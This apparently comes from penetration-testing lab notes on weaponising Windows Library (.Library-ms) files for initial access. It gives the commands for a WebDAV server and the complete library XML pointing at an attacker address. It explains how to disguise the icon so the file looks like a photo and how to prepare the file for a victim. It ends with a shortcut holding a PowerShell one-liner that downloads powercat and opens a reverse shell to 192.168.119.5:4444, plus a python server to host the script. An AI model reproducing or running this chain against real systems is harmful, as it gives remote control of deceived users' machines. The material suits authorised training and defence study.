Windows Library Files
Windows Library Files are virtual containers used to connect users with data located in remote locations like web services or SMB shares.
Windows Library Files have a .Library-ms extensions and are executed by double clicking on them.
WebDAV
In order to share our malicious Windows Library file to the victim we will create a WebDAV share to host the staged payload.
Start WebDAV Server
──(env)─(kali㉿kali)-[~/web]
└─$ /home/kali/env/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/web/

Create Windows Library File
We will create a new file on our Windows host and name it "dog.Library-ms".
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.119.5</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Right now the icon is a little suspicious, let's change it to something else, like a photo.
Customizing Library File
Change Icon
<iconReference>imageres.dll, -1003</iconReference>

Testing & Fixing Serialization
We can test to see if it's working by double clicking our "dog" icon on the deskop.

Re-open Visual Studio Code
We can see if the re-open "dog" that the code has been changed. This happens due to Windows trying to optimize the WebDAV communication with the client. So before we ship it off the the victim we have to make sure that we've fixed it and NOT OPENED it on our end.

Delete the serialized tag and fix the url tag with:
<url>http://192.168.119.2</url>
Create Shortcut
We will create a shortcut on the Desktop. This shortcut will download powercat and open a reverse shell. Add the following by: Right-Click Desktop and select New > Shortcut.
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.5:8000/powercat.ps1'); powercat -c 192.168.119.5 -p 4444 -e powershell"
Start Web Server
We will create a python web server to serve the powercat script.
kali@kali:~/beyond$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
kali@kali:~/beyond$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Last updated